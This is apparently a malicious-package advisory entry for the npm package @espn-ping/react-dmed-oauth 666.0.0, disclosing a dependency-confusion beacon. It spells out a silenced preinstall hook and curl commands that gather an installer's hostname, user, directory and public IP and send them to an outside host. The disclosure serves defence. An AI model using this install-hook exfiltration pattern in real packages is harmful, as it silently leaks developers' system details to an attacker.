MAL-2026-10401

    Dashboard / Malicious Package / MAL-2026-10401

    MAL-2026-10401

    Published: 13 Jul 2026Last Modified: 1 Sept 2026Aliases: 
    GHSA-c99m-x4q9-727p

    Summary: Malicious code in @espn-ping/react-dmed-oauth (npm)

    Details: Source: amazon-inspector (3bc0467ac62043cf22dd249a99ff1279646dc599702140998ff5b86c79645364) @espn-ping/[email protected] declares a preinstall lifecycle script (`node index.js > /dev/null 2>&1`) that automatically executes on `npm install`. index.js shells out via child_process.exec to collect the installer's hostname, current working directory, username, and public IP (via `curl https://ifconfig.me`), then transmits the encoded data via `curl -k` GET to `https://r.dontvisitmy.website/sendreq.php?newdata=...`. Output is suppressed to hide the beacon from the installer's console. The scope `@espn-ping` and version `666.0.0` are consistent with a dependency-confusion beacon targeting an internal ESPN/Disney namespace.

    Affected packages

    Package

    Name: @espn-ping/react-dmed-oauth

    Purl: pkg:npm/%40espn-ping/react-dmed-oauth

    Affected ranges

    Type: N/A

    Events:

    Introduced- None
    Fixed -None

    Affected versions

    666.0.0